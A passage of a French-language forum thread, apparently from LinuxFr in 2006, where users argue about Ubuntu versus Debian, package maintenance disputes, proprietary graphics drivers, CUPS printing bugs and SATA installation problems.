                                                  C'est si difficile de décider que puisque la personne ne tient pas ses engagements, et que d'autres sont prèts à reprendre le flambeau, on accepte de prendre le paquet venant des personnes motivées (sous réserve que la qualité y soit)?

                                                  dans les années à venir.


                                                  Debian a t'il encore tant de temps à perdre? Combien de développeurs de paquets devront encore tourner le dos avant qu'une procédure simple, rapide et efficace soit mise en place pour gérer ce genre de problèmes?
                                                  • [^] # Re: Non Respect

                                                    Posté par (page perso) . Évalué à 2.

                                                    C'est si difficile de décider que puisque la personne ne tient pas ses engagements

                                                    Définis les de façon objective et générale et on en reparle.
                                                  • [^] # Re: Non Respect

                                                    Posté par . Évalué à 2.

                                                    C'est si difficile de décider que puisque la personne ne tient pas ses engagements, et que d'autres sont prèts à reprendre le flambeau, on accepte de prendre le paquet venant des personnes motivées (sous réserve que la qualité y soit)?

                                                    Ce fut le cas récemment avec bacula, mais le problème de certains paquets est beaucoup plus compliqué, les paquets sont maintenus « un minimum » pour montrer qu'il est toujours présent, par une personne répondant aux mails et reportant des bugs. Le mainteneur est maître de ses paquets, c'est à lui de décider s'il veut le passer en team ou non. Or pour python par exemple, il a déjà refusé explicitement de le maintenir via une équipe. Pourquoi ? puisqu'il sait qu'il n'a pas le temps de s'en occuper.

                                                    Il y a une procédure d'expulsion, mais bien que l'entrave soit manifeste, il reste aassez actif pour ne pas avoir tous les autres développeurs contre lui. C'est une obstruction manifeste, mais gérable très difficilement.
                                                    • [^] # Re: Non Respect

                                                      Posté par . Évalué à 4.

                                                      la formulation même de la phrase "Le mainteneur est maître de ses paquets" montre qu'il y a un problème à régler. les paquets devraient être affectés à une ou des personnes, pas confiés à ce point sans responsabilités ni comptes à rendre.
                                            • [^] # Re: Non Respect

                                              Posté par . Évalué à -3.

                                              Oui. D'ailleurs, [u]une des principales raisons pour lesquelles la Chine connaît une meilleure réussite économique que l'Inde est qu'il s'agit d'un régime autoritaire[/u]. Est-ce que la Chine est pour autant un modèle ?


                                              preuves ?

                                              Tu balances des affirmations sans aucune preuves (un peu comme pour le cas Ubuntu/debian quoi). La Chine et l'Inde ont des histoires totalement différente. La réussite économique d'un pays ne dépend pas uniquement de son régime politique. Et puis réussite économique, bof. La Chine s'endette de façon faramineuse actuellement et la prétendue réussite économique est parfois un leurre (comme le montre tous ces beaux gratte-ciels neufs, mais vides).
                                        • [^] # Re: Non Respect

                                          Posté par (page perso) . Évalué à 0.

                                          Je suis assez d'accord, ce n'est pas parce qu'une organisation à des failles permettant à d'autres de la mettre à mal qu'il faut en profiter.
                                  • [^] # Re: Non Respect

                                    Posté par (page perso) . Évalué à 5.

                                    "afin de garder une certaine mainmise sur la distribution"
                                    Tu/Vous pensez vraiment que canonical fait cela pour controller debian (et encore ils ne le controlent pas du tout, au mieux cela peut ralentir les developpements) ?

                                    Moi je ne vois pas de strategie derriere, Mark S veut simplement les meilleures personnes disponibles, et qui de mieux que des devs debian pour travailler sur une distrib debian-based?

                                    Prouvez moi que canonical veut influer sur debian et le controller (alors que cela ne leur apporterait strictement rien) et je serai d'accord avec vous mais pour le moment...
                                • [^] # Re: Non Respect

                                  Posté par . Évalué à 3.

                                  Exemple depuis breezy (8 mois) ubuntu est sous python 2.4 par defaut (les benchs on montre un gain de ~30%) qui est la version stable de python depuis un bon moment, debian est toujours a la 2.3 et le sera probablement encore pour la sortie de etch cet hiver si tout va bien. J'utilise dans mon boulot plein de soft qui necessite 2.4 donc exist python debian car je n'ai pas besoin de remplir mon DD avec 2 ou 3 versions du meme logiciel. C'est un example parmis tant d'autre.

                                  Il a été expliqué pourquoi debian est en python 2.3 sur un journal. Lis ces saletés de commentaires au lieu de dire n'importe quoi. Python 2.4 n'est pas le python par défaut, parce que le mainteneur de python est employé par ubuntu et qui par conséquent bosse pour ubuntu en priorité (ce qui est normal), par contre, qu'il se contrefoute royalement de python dans Debian, ça c'est inacceptable.
                                  • [^] # Re: Non Respect

                                    Posté par . Évalué à 1.

                                    dans ce cas la, remplace le.

                                    c'est pas comme si ubuntu ou cannonical empêchait quelqu'un de faire le boulot.
                  • [^] # Re: Non Respect

                    Posté par (page perso) . Évalué à 9.

                    C'est pourtant un débat que je vois revenir souvent, surtout lors d'une discussion sur les efforts que doivent/devraient/pourraient fournir les constructeurs de matériel pour mettre à disposition des pilotes libres et/ou des specs.

                    C'est pas le gain d'utilisateurs amené par Ubuntu qui va changer quoi que ce soit au fait qu'un grand nombre de constructeurs ne fournissent pas de pilotes (libres ou non). Je rappelle que le problème se pose également dans une large mesure pour Mac OS X, qui manque cruellement de drivers pour les périphériques third-party. Apple ayant ses propres machines, elle peut commander à ATI des pilotes pour des cartes spécifiques pour son OS, solution à plusieurs titres inenvisageable pour GNU/Linux. Par conséquent, on a des pilotes qui sont de largement moins bonne qualité mais qui suffisent à garantir un (petit) segment de marché à bas prix.

                    La libération des sources ou des spécifications des cartes graphiques n'a rien à voir avec le nombre d'utilisateurs. C'est une question politique et industrielle, et Ubuntu pourrait avoir 50% de parts de marché que ATI et Nvidia ne libérerait vraisemblablement pas leur code source.

                    À la rigueur, on pourrait donc imaginer qu'une augmentation substantielle du nombre d'utilisateurs de GNU/Linux (disons, passer de 1% à 5% de PDM) pourrait amener à des pilotes propriétaires de meilleure qualité. Sauf que, j'aimerais bien avoir des chiffres par rapport à ça. De ce que je peux voir ici, sur IRC ou ailleurs, la majorité des utilisateurs d'Ubuntu semblent avoir déjà testé GNU/Linux avant - souvent hésitant de distribution - pour se fixer finalement sur Ubuntu. Gain d'utilisateur ? Sans doute, mais pour le moins mineur. Qui plus est, concernant les pilotes, on est plutôt dans un processus inverse : ATI, qui du temps de la rage128 refusait de libérer la moindre spécification ou pilote, avait aidé au développement d'un pilote libre (avec SuSE, à l'époque) pour ses cartes, et on a eu pendant des années des pilotes libres et assez complets pour les cartes ATI. Depuis quelques années, retour en arrière... pilote propriétaire et aucune spec. Les raisons de ce changement restent à analyser : évolutions industrielles sans doute, lobbying moins fort aussi (tout le monde ou presque se contente aujourd'hui d'un pilote non libre : les Ubuntu zealots ici vont même jusqu'à me répondre que ça ne les "choque pas"...).

                    Par contre des arguments anti-ubuntu, à part 2/3 arguments techniques je vois surtout un discours anti canonical

                    Comme si le discours anti-Canonical était un discours idéologique pas valide. Je suis désolé, mais le discours anti-Canonical se base sur des faits : non reversement à Debian, contributions spécifiques à Ubuntu sans souci du libre, non-participation à des projets libres, attitude schizophrène vis à vis du logiciel non-libre (inclu sur les CDs et supporté, installé en standard, conspué d'un côté et jugé normal quand Ubuntu le fait), et j'en passe. Le journal où tu es intervenu présentait nombre d'éléments concrets. Oui, c'est mon principal problème avec Ubuntu, même si par ailleurs je ne l'apprécie pas techniquement.

                    Quand au fait de choisir d'inclure des versions de developpement dans les distribs, ca ne me dérange pas du tout si c'est la meilleure solution (puis je n'ai pas vraiment vu de retours sur cups à part pour des problèmes de pilotes)

                    Et en quoi c'est la meilleure solution ? C'est certainement la meilleure solution pour affirmer qu'on est en avance sur Debian, certainement la meilleure solution aussi pour sortir des releases tous les six mois sans avoir des logiciels obsolètes (hé oui, le cycle de développement de tous les logiciels n'est pas le même et la release de la prochaine version majeure pourra tomber un mois après la release, truc de fou !), mais d'un point de vue qualité ça n'est que très rarement la meilleure solution. Concernant les noyaux, Apache, Xfce, c'est même rarement une bonne idée. Sauf à considérer que si Ubuntu le fait, c'est que forcément c'est la meilleure solution...

                    Pour CUPS, problème très concret en breezy : la version de CUPS est incapable de faire fonctionner mon imprimante (Canon BJC-210, plus de dix ans d'âge, simplissime !). À cela plusieurs raisons : d'abord, le gestionnaire CUPS de Gnome est extrêmement incomplet et reste très buggé (segfaults, bugs graphiques, annulation de tâche qui marche pas une fois sur deux : ce sont des problèmes connus upstream, c'est un logiciel jeune) ; ensuite, l'interface web de CUPS a été désactivée (un joli message te le dit quand t'essayes de t'y connecter : n'importe quoi !), ce qui rend carrément pénible l'installation d'une imprimante quand le logiciel Gnome ne fonctionne pas ; et enfin, la version de CUPS fournie est tout simplement buggée. Installer un CUPS de Debian n'était clairement pas une solution puisque ça niquait à peu près tout le système de paquets (ce qui est assez normal, somme toute). Résultat : dû installer et configurer un lprng/magicfilter à la main depuis universe, en ligne de commande. Mais comme la moitié des applications sont configurées pour utiliser uniquement CUPS, j'ai vingt fois moins d'options d'impression que sur ma Debian. *Joie* *bonheur*.

                    Ce qui me fait le plus chier, c'est les pro-debian qui n'arretent pas de crier au vol/viol de leur distrib, alors que debian affiche fièrement qu'ils se rejouissent que d'autres sortent des distribs debian-based car cela prouve leur talent.

                    C'est normal qu'il y ait des dérivés. Les forks sont également autorisés. Pour autant :

                    * Toute distribution dérivée ou fork n'est pas bonne pour autant : ça n'est pas parce qu'ils ont le droit de le faire que ce qu'ils font est bien. Les pratiques de Canonical envers Debian ne sont à mon sens clairement pas correctes, et j'ai expliqué pourquoi.
                    * On n'a pas de raison de se réjouir parce qu'il y a une nouvelle distribution, qu'elle soit Debian-based ou non. Si la distribution apporte concrètement quelque chose aux utilisateurs, au Libre, alors il y aura des raisons de s'en réjouir. J'ai longuement expliqué pourquoi ça n'était pas le cas d'Ubuntu, par des arguments qui restent à démonter.

                    Il n'y a pas d'opposition entre Debian et les pro-Debian comme tu le sous-entends. Debian n'a pas de position sur Ubuntu. Beaucoup de développeurs en sont mécontents, d'autres se tournent vers Ubuntu. Hé oué, y a des gens compétents, qui savent de quoi ils parlent et qui ont des arguments qui ne sont pas pro-Ubuntu. Mais non, ce ne sont que des intégristes pro-Debian aigris, j'oubliais...
                    • [^] # Re: Non Respect

                      Posté par . Évalué à 3.

                      Le nombre d'utilisateurs du libre va changer quelque chose. Si nous avons l'espoir d'avoir un format de suite bureautique libre, c'est parce que des entreprises et des administrations utilise OpenOffice et sorte de la prison du logiciel propriétaire !

                      > non reversement à Debian

                      Là manu, tu exagères :). Il y A des échanges debian-ubuntu. Certainement pas comme on le voudrais, mais il y en a et dans les deux sens (mais surtout dans le sens debian->ubuntu, je te l'accorde). Ce n'est pas parce que certains

                      > contributions spécifiques à Ubuntu sans souci du libre, non-participation à des projets libres

                      Pareil, c'est trop catégorique. Autant des projets comme usplash aurait dû être créer plus indépendamment d'ubuntu (en même temps, RH et SuSE font leur truc et libre aux autres de le réutiliser), Regardes les projets SoC d'Ubuntu[1], nombreux sont les projets qui ne sont as spécifique à Ubuntu et qui sont utile à toute la communauté. Je pense notemment les contributions à XGL, Gnome, etc. Quelle est la participation de Debian aux projet upstream ? À part du retour de bugs ? Elle doit bien être comparable à celle d'Ubuntu. Sur le CVS de Gnome, on voit surtout des gus de RH travailler sur gtk+ (par exemple).

                      Chaque distros développe ses propres outils.

                      > attitude schizophrène vis à vis du logiciel non-libre (inclu sur les CDs et supporté, installé en standard, conspué d'un côté et jugé normal quand Ubuntu le fait)

                      C'est vrai, linux-restricted-modules est installé par défaut. Pourtant, ma nVidia est gérée par le pilote nv, et mon ati par radeon. C'est clair qu'il ne devrait pas installer de pilotes non libres comme ils le font déjà pour les codecs.

                      [1] http://code.google.com/soc/ubuntu/about.html
                      • [^] # Re: Non Respect

                        Posté par (page perso) . Évalué à 2.

                        Là manu, tu exagères :). Il y A des échanges debian-ubuntu. Certainement pas comme on le voudrais, mais il y en a et dans les deux sens (mais surtout dans le sens debian->ubuntu, je te l'accorde).

                        cites en 5 significatifs (parmi les plus important, j'entends)

                        Quelle est la participation de Debian aux projet upstream ?

                        Debian, n'emploi pas de salariés, n'a que très peu de fond (et ne vante pas d'avoir un milliardaire à sa tête) donc payé des devs sur des trucs particuliers est difficile.

                        Debian est composé de développeurs qui font partie de projet upstream : VLC, grisbi, contributeurs fréquents au noyau, etc ...

                        De plus debian supporte une quantité importante d'architecture (matériel et logiciel), c'est en général très utile aux projets upstreams divers, exemple : Debian GNU/Hurd.

                        Et pour le Soc, attendons de voir ce qu'il ressort des projets mentorés par Ubuntu.

                        M.
                      • [^] # Commentaire supprimé

                        Posté par . Évalué à 1.

                        Ce commentaire a été supprimé par l'équipe de modération.

                        • [^] # Re: Non Respect

                          Posté par (page perso) . Évalué à 2.

                          ils veulent un truc qui fonctionne et sans avoir a tout bidouiller et ca Ubuntu le fournit
                          Parcequ'avec les drivers libres (nv, radeon) au lieu des drivers proprios (nvidia, fglrx), ça ne marcherait pas ? Étienne dit justement le contraire dans son commentaire : ses cartes marchent très bien avec les drivers libres, et pourtant Ubuntu utilise les drivers propriétaires pour les gérer.
                          Ensuite, nous ne pensons pas en tant que "Geek", mais en tant que défenseurs du libre. En effet, si une distribution "majeure" met en avant les drivers propriétaires, c'est un cautionnement de ce mode de développement, et une incitation pour tous les constructeurs à ne pas donner leurs specs. Si Linux, ou d'autres projets ont pu en arriver là où ils sont aujourd'hui, c'est grâce à la défense de ces libertés, et il faut que cela continue. Je trouve vraiment dommage que le côté "technique" soit de plus en plus mis en avant par rapport au côté "philosophique". Quand j'ai choisi d'utiliser une distribution Linux, c'était justement parceque j'étais convaincu du bien fondé des logiciels libres, et pas comme on peut le voir maintenant "parceque c'est gratuit" ou "parceque c'est à la mode".
                          la distrib [Debian] [...] est [...] donc inutile
                          Au nom de l'ensemble des participants au projet Debian depuis 1993, et des dizaines de milliers d'utilisateurs de Debian à travers le monde, je tiens à te remercier chaleureusement pour toute la gratitude dont tu fais part à l'égard de Debian.
                          • [^] # Re: Non Respect

                            Posté par (page perso) . Évalué à 4.

                            > Étienne dit justement le contraire dans son commentaire : ses cartes
                            > marchent très bien avec les drivers libres, et pourtant Ubuntu utilise
                            > les drivers propriétaires pour les gérer.

                            Euh, sur mes deux postes installés tout frais avec Dapper :
                            - les modules proprio nvidia sont bien installés et disponibles (ils sont dans un paquet global avec tous les modules proprio et ce paquet est installé)
                            - mais le xorg est configuré avec nv (le driver libre)

                            Ce que tu demande est déjà le cas par défaut.


                            > Je trouve vraiment dommage que le côté "technique" soit de plus en
                            > plus mis en avant par rapport au côté "philosophique". Quand j'ai
                            > choisi d'utiliser une distribution Linux, c'était justement parceque
                            > j'étais convaincu du bien fondé des logiciels libres

                            Il faut aussi accepter que tout le monde n'ait pas tes objectifs et tes motivations (donc que ce ne soient pas forcément les tiennent qui priment).

                            Le fait d'installer le paquet proprio mais d'utiliser les outils libres par défaut quand ils fonctionnent me semble un bon compromis. C'est ce qui est fait ici.
                          • [^] # Commentaire supprimé

                            Posté par . Évalué à 3.

                            Ce commentaire a été supprimé par l'équipe de modération.

                            • [^] # Re: Non Respect

                              Posté par (page perso) . Évalué à -3.

                              par defaut ubuntu utilise les drivers libres.

                              Mais il installe les drivers non libres, les distribue, les supporte. Same difference.

                              Perso j'ai tente de mettre pas mal de monde sur debian, le constat a ete simple AUCUNE n'a garde linux... J'ai tente avec Ubuntu et pour le moment le taux de reussite est de 50%...

                              Et ton echantillon etait representatif ? Ta connaissance des deux systemes similaire ? Le choix des versions ? On peut contacter les gens en question ? Ce sont des donnees inverifiables et non-analysables : aucun interet argumentatif.

                              Enfin bon de tout de facon sur le portable recent avec des DD et des lecteurs DVD sata debian est ininstallable donc la question debian ou ubuntu ne se pose meme pas!

                              C'est faux. Installation sur un T43p sans aucun probleme encore recemment.

                              Ouh la la derniere phrase non seulement coupe mais en plus arrange au niveau des mots ne merite meme pas un commentaire autre que celui la...

                              Je te cite : la distrib est superbe techniquement mais inutilisable out-of-box par la majorite des gens et donc inutile.. La conclusion est claire " Debian est donc inutile". Globalement, tu viens de te discrediter et de t'aliener une bonne partie des personnes ici. Les zealots sont bien souvent les pires ennemis de la cause qu'ils defendent : tu viens de l'illustrer avec brio.
                              • [^] # Commentaire supprimé

                                Posté par . Évalué à 1.

                                Ce commentaire a été supprimé par l'équipe de modération.

                                • [^] # Re: Non Respect

                                  Posté par (page perso) . Évalué à 1.

                                  ouhais enfin bon tu peux tourner autour du pot cela ne change rien a mes constations et a celles d'autre personne. Enfin si tu preferes te fermer les yeux et considerer comme parfait debian tant pis (mieux?) pour toi. Moi je constate que ubuntu pour un debutant sous linux est utilisable pas l'inverse mais je ne cotoie pas que des informaticiens...

                                  Je ne préfère pas fermer les yeux, je préfère les arguments valables. Concrètement, que suis-je censé faire de cet argument ? T'opposer que moi, ma mère ne supporte pas Ubuntu alors que Debian, oui ? Et on aura vachement avancé en ayant confronté nos expériences... Ces données ne valent rien d'un point de vue argumentatif. Si tu veux montrer qu'Ubuntu convient mieux à ces gens là, analyse pourquoi en profondeur et là on pourra avoir des arguments intéreressants.

                                  ouhais enfin encore une fois tu mets en doute mes dires, il n'empeche que sur un z60m le mois dernier cela ne passait pas (j'utilise debian depuis 99 et donc me considere pas vraiment comme un debutant sur le sujet).

                                  Je remets en cause ta généralisation abusive. Je n'ai aucune idée de pourquoi l'installation ne passait pas sur ton z60m, mais la raison que tu donnais n'est certainement pas la bonne. Encore une fois, quelle valeur à cet argument? Je vais t'opposer comme plus haut que sur l'AMD64 (fixe) d'un ami, l'installation d'Ubuntu n'est jamais passée (c'est véridique), et on aura pas plus avancé... Si on savait, l'un comme l'autre, la cause du problème, on pourrait argumenter. Comme je ne la sais pas, je m'abstiens de critiquer sur ce point.

                                  La derniere partie ne merite toujours pas que je reponde.

                                  Effectivement, ce serait dommage qu'il y ait un argument dans ta réponse. Est-ce que tu contredis le fait que "A est X, donc est Y, donc est Z" implique le fait que "A est Z" ?

                                  Reste dans tra bubulle et continue a surtout ne pas regarder ce qui se passe a cote cela pourrait donner des idees pour ameliorer les choses.

                                  T'as aucune idée de ce que je fais dans la vie, de mes méthodes ou même de mon opinion technique sur Ubuntu, que je n'ai pas développé à part pour citer des problèmes plus haut. Tu ne fais que balancer un discours pré-fabriqué anti-intégriste qui n'a aucun rapport. Garde le pour toi.
                            • [^] # Re: Non Respect

                              Posté par . Évalué à 0.

                              Enfin bon de tout de facon sur le portable recent avec des DD et des lecteurs DVD sata debian est ininstallable donc la question debian ou ubuntu ne se pose meme pas!

                              Pas tout à fait exact.

                              Je viens d'installer (il y a deux jours) une debian testing(etch) à l'aide d'un daily built netinst CD image sur un portable dell latitude D510.
                              Pour le problème avec sata, il suffit de taper
                              install libata.atapi_enabled=1
                              au lancement du CD.

                              Sur la page de téléchargement http://www.us.debian.org/devel/debian-installer/ il est écrit :
                              "Before you download the daily built images, we suggest you check for known issues."
                              En suivant les liens, on arrive à http://wiki.debian.org/DebianInstaller/SataAtapiHowto

                              Effectivement, il faut aimer RTFM pour utiliser une debian, et moi je suis RTFMiste.
                              • [^] # Commentaire supprimé

                                Posté par . Évalué à 1.

                                Ce commentaire a été supprimé par l'équipe de modération.

                                • [^] # Re: Non Respect

                                  Posté par (page perso) . Évalué à 3.

                                  Déformation évidente de la réalité. J'ai installé Debian GNU/Linux sur un T43p il y a bien plus d'un mois, et ça marchait très bien.

                                  Non seulement le problème est de loin plus spécifique que ce que tu dis (il n'y a pas de problème général avec SATA), mais en plus il est aisément contournable et c'est marqué EN GROS.

                                  Merci d'arrêter le FUD. Ça devient de plus en plus voyant - et lourd.
                                  • [^] # Commentaire supprimé

                                    Posté par . Évalué à 1.

                                    Ce commentaire a été supprimé par l'équipe de modération.

                                    • [^] # Re: Non Respect

                                      Posté par (page perso) . Évalué à 2.

                                      Il n'empeche que tu ne changeras a MA realite

                                      Effectivement. Désolé, je ne crois pas aux réalités alternatives. Je ne crois pas avoir une réalité différente de la tienne.

                                      Je ne remets pas en cause le fait que ça n'ait pas marché il y a un moins sur ton laptop out of the box. C'est sûrement dû à un bug quelque part - ou au moins à quelque chose qui aurait pu être amélioré pour ne pas demander d'intervention particulière. Mais tu fais de ton cas une réalité générale sans même donner le fond du problème rencontré : ça, c'est faux. Et mon cas est un contre exemple, ce qui logiquement suffit à rendre fausse ton assertion générale (Debian ne fonctionne pas sur les laptops récents à cause du SATA).

                                      Donc, oui, je maintiens : affirmer et maintenir cela relève du FUD. Tu ne fais que le confirmer.

                                      En gros pour toi il vaut mieux rester sous windows que prendre une distributions ubuntu car elle est (dans sa version stable) installable quasi partout facilement et utilisable de facon simple par tout le monde.

                                      Tu es en train d'inventer. Je n'ai jamais parlé de simplicité d'installation, d'utilisation ou même de ce qui était mieux entre rester sous Windows et passer sous Ubuntu.

                                      Sacre ouverture d'esprit, je te felicite...

                                      Je dois reconnaître que ton ouverture d'esprit, qui te permet jusqu'à entendre des opinions qui n'ont jamais été émises, m'impressionne, effectivement.
                                • [^] # Re: Non Respect

                                  Posté par . Évalué à 2.

                                  Cet argument est complètement stupide. Ca me rappel les arguments traditionnels Windows/Linux : "ouihh euhh sous linux mon matériel derrnière génération n'est pas supporté, il faut attendre des mois, alors pourquoi je quitterais windows, tralalalalalalalala".

                                  Si tu choisis CORRECTEMENT ton matériel, il n'y a pas de problème, avec quelque système que ce soit (linux, *bsd, *solaris, windows...).

                                  J'ai eu un portable acer il y a quelques années, que ce soit Debian ou Ubuntu, elles ont toutes refusées une install normale pendant plus de 6 mois.

                                  Est-ce que pour autant c'est la faute de la distrib ? Est-ce que c'est la faute de Linux, des développeurs ? Je ne crois pas. Si les développeurs n'ont pas le matériel pour tester, il ne peuvent que très difficilement ajouter du support pour ce matériel. Et acheter la totalité des configurations possibles de la planete, je ne connais pas d'entreprise et encore moins de particuliers qui peuvent le faire.

                                  Ajoutons à cela que bien souvent le matériel non supporté vient du fait que les fabricants ne donnent pas les docs pour supporter leur matériel.

                                  Ton argument est donc bancale, et tu ne peux t'en prendre qu'à toi. Si tu voulais vraiment faire tourner ton système préféré, tu aurais choisi la machine/constructeur approprié.
                          • [^] # Re: Non Respect

                            Posté par . Évalué à 2.

                            J'ai dit que bizarrement, Ubuntu installait les linux-restricted-modules alors qu'elle ne les utilise pas dans la config par défaut des carte nVidia et ATI que j'ai connu. Parcontre, ça peut être utile pour certaines cartes wifi (ipw* et consorts notamment) ce qui à mon avis est plus important que l'accélération 3D.

                            Ubuntu semble éviter les pilotes propriétaires, mais fais plus de compromis que Debian, c'est clair. Cependant, Ubuntu ne met pas en avant les pilotes propriétaires ! Rien à voir avec les annonces de Novell !

                            Étienne.
                            • [^] # Re: Non Respect

                              Posté par . Évalué à 0.

                              ça peut être utile pour certaines cartes wifi (ipw* et consorts notamment)

                              A une nuance pres, que les firmwares binaires sont directement dans le package du noyau, dans main.
                        • [^] # Re: Non Respect

                          Posté par (page perso) . Évalué à -4.

                          Ubunutu sans Debian, c'est trois wallpapers et quelques icones traduit en 3 langues qui se battent en duel donc bon le 'inutile' il fait pas voler bien tes arguments !!!

                          M.
                    • [^] # Re: Non Respect

                      Posté par . Évalué à 2.

                      Pour imprimer sur cette version d'Ubuntu, certains sont vraiment mécontents : http://www.kdedevelopers.org/node/2064
                    • [^] # Re: Non Respect

                      Posté par (page perso) . Évalué à 0.

                      "À la rigueur, on pourrait donc imaginer qu'une augmentation substantielle du nombre d'utilisateurs de GNU/Linux (disons, passer de 1% à 5% de PDM) pourrait amener à des pilotes propriétaires de meilleure qualité"

                      Effectivement j'aurai du preciser que des pilotes proprietaires seraient beaucoup plus facilement disponibles mais je pense quand même que de meilleurs pilotes libres apparaitraient également, ne serait-ce que par la venue de nouveau developpeurs, des pressions des distribs pour un support out of the box....

                      "De ce que je peux voir ici, sur IRC ou ailleurs, la majorité des utilisateurs d'Ubuntu semblent avoir déjà testé GNU/Linux avant"
                      Tu ne traines peut-etre pas sur le même channel ;)
                      Personellement ubuntu est la première distrib linux installée sur mon pc (j'avais vu une mandrake tourner sur l'ordi de mon frere mais rien de merveilleux). De ce que je peut voir sur le forum la majorité des nouveaux venus viennent du monde proprietaire. Il y en a egalement pas mal qui viennent d'autres distribs mais ils y sont restes generalement pas plus d'une semaine et veulent en fait faire le tour de l'"offre" existante.

                      "Les raisons de ce changement restent à analyser : évolutions industrielles sans doute, lobbying moins fort aussi"

                      J'avoue que le fait que les distribs "grand public" essayent actuellement (cf integration de vmplayer chez ubuntu, et strategies pour les pilotes chez suse) d'integrer au mieux le proprio au lieu de faire pression pour le libre me désole beaucoup, et j'espère de tout coeur qu'une fois la "masse critique" atteinte cela changera (et même avant).

                      "Et en quoi c'est la meilleure solution ?"
                      Pour sortir un truc qui soit le plus adapté pour les utilisateurs. En l'occurence je n'ai jamais testé xfce plus que ca mais la version de dev inclue dans dapper doit etre mieux (ergonomie toussa) que la version actuelle stable non?
                      Pour les noyaux il ne me semble pas que ubuntu intègre de noyaux experimentaux et plus buggués que les autres distribs
                      Pour apache je ne connais pas l'affaire et je ne parlerai donc pas.

                      "On n'a pas de raison de se réjouir parce qu'il y a une nouvelle distribution"
                      Effectivement, mais on a egalement pas de raison de se sentir directement aggresse

                      "Il n'y a pas d'opposition entre Debian et les pro-Debian comme tu le sous-entends. Debian n'a pas de position sur Ubuntu. Beaucoup de développeurs en sont mécontents, d'autres se tournent vers Ubuntu."
                      En fait je me referais surtout ici a linuxfr ou pas mal de gens semblent vouloir parler au nom de leur distribution (voir plus bas effectivement ou quelqu'un affirme parler au nom de milliers de personnes...)
                      Effectivement debian n'a pas de position publiquement affichée sur ubuntu.

                      Je ne dis pas que ubuntu roxor et debian sucks ni rien de tout cela, j'aime bien quand on débat intelligemment sur la distrib que j'utilise, même si cela n'arrive pas souvent.
                      • [^] # Re: Non Respect

                        Posté par (page perso) . Évalué à 2.

                        mais je pense quand même que de meilleurs pilotes libres apparaitraient également, ne serait-ce que par la venue de nouveau developpeurs, des pressions des distribs pour un support out of the box....

                        C'est plus qu'hypothétique. Actuellement, les éditeurs de distribution ne se battent pas franchement pour avoir autre chose que des pilotes non libres. S'il n'y a pas de changement d'un point de vue du marché des cartes graphiques, je doute très sincèrement que les constructeurs de cartes fournissent des pilotes libres s'il n'y a pas pression très importante des utilisateurs. Et actuellement, je le répète, on peut voir que les nouveaux utilisateurs et pas mal de ceux qu'on voit ici ne sont pas près de faire pression, puisqu'ils considèrent que la présence de ces pilotes est un bon compromis (je sais pas pourquoi on devrait faire un compromis sur nos fins, mais bon), largement acceptable voire bien... Regarde juste les commentaires autour.

                        Quant à l'arrivée de nouveaux développeurs, on peut dire que j'ai longuement développé pourquoi je pense qu'il y a un ralentissement très net de l'augmentation du nombre de développeurs sur la plupart des projets, et que la venue des nouveaux utilisateurs aujourd'hui ne crée que très peu de nouveaux développeurs. Aux deux extrêmes, ça se vérifie assez bien : l'innovation dans les logiciels libres stagne, particulièrement dans les logiciels majeurs, tandis qu'on peut voir pas mal d'utilisateurs qui sont là depuis pas mal d'années ne pas s'intéresser du tout au développement (mais contribuer par d'autres moyens - c'est bien, mais ça sert à rien si y a pas de code). Mais je répète ce que j'ai déjà dit sur http://linuxfr.org/~fabrom/21718.html ...

                        J'avoue que le fait que les distribs "grand public" essayent actuellement (cf integration de vmplayer chez ubuntu, et strategies pour les pilotes chez suse) d'integrer au mieux le proprio au lieu de faire pression pour le libre me désole beaucoup, et j'espère de tout coeur qu'une fois la "masse critique" atteinte cela changera (et même avant).

                        Je n'ai jamais cru que des entreprises commerciales - et je me suis attaché à montrer que Canonical avait avant tout ses propres intérêts à c½ur dans le journal plus haut - allait magiquement faire du lobbying pour le libre de leur propre chef. Ce qui m'inquiète en revanche beaucoup plus, c'est que parmi les utilisateurs récents et les nouveaux arrivants, on peut pas dire que l'esprit soit à la protestation contre ces pilotes non libres. Il y a six ans, ce n'était pas le cas. La force de l'habitude, les drivers NVidia bien ancrés dans le paysage ont fait que le passage d'ATI aux pilotes non libres s'est fait sans grand bruit... Bien plus inquiétant.

                        Pour sortir un truc qui soit le plus adapté pour les utilisateurs. En l'occurence je n'ai jamais testé xfce plus que ca mais la version de dev inclue dans dapper doit etre mieux (ergonomie toussa) que la version actuelle stable non?

                        La stabilité est une qualité avec laquelle on ne peut pas jouer face à un débutant qui arrive sous GNU/Linux. Et le fait que Windows soit aussi peu stable ne nous permet pas une marge de man½uvre. D'une part, parce que la plupart des débutants restent méfiants vis à vis du nouveau système et prêts à re-passer à Windows assez rapidement : trouver un gros bug (comme ça arrive assez souvent dans les versions de développements) dans un logiciel vital, ça signifiera bien souvent un frein à, voire la fin de son aventure GNU/Linux. D'autre part, GNU/Linux se vend généralement plus sur la stabilité et la robustesse (toutes relatives) que sur autre chose. Parce que de fait, il prend du retard sur ses concurrents propriétaires sur pas mal d'autres terrains. Lui enlever cet argument, c'est le tuer chez tous les indécis...

                        Personellement ubuntu est la première distrib linux installée sur mon pc (j'avais vu une mandrake tourner sur l'ordi de mon frere mais rien de merveilleux). De ce que je peut voir sur le forum la majorité des nouveaux venus viennent du monde proprietaire. Il y en a egalement pas mal qui viennent d'autres distribs mais ils y sont restes generalement pas plus d'une semaine et veulent en fait faire le tour de l'"offre" existante.

                        J'ai l'impression que tu sous-estimes grandement ceux qui font le tour de l'offre existante. De toutes façons, juger par les milieux d'informaticiens est rarement un bon plan. J'essaye de constater par les autres milieux : par exemple, parmi les étudiants en langue du L3 au M2, là où je travaille, il y a cette année cinq personnes qui utilisent vraiment GNU/Linux chez eux. Ce nombre est à peu près stable depuis 2 ans, après avoir augmenté. Je constate de même dans mon école : si le nombre d'utilisateurs de Firefox et même d'OpenOffice augmente, le nombre d'utilisateurs de GNU/Linux reste très bas et semble augmenter uniquement très lentement... Il n'y a évidemment pas moyen de faire des graphiques représentatifs, mais il me semble que s'il a pas mal augmenté il y a quelques années, il y a un certain tassement... Je serai ravi que ce soit le contraire si GNU/Linux sait apporter des libertés effectives à ces nouveaux utilisateurs, si parmi eux on voit émerger les nouveaux développeurs dont on a besoin et si ces utilisateurs restent pour découvrir le libre. J'en suis cependant de moins en moins convaincu.

                        Pour les noyaux il ne me semble pas que ubuntu intègre de noyaux experimentaux et plus buggués que les autres distribs

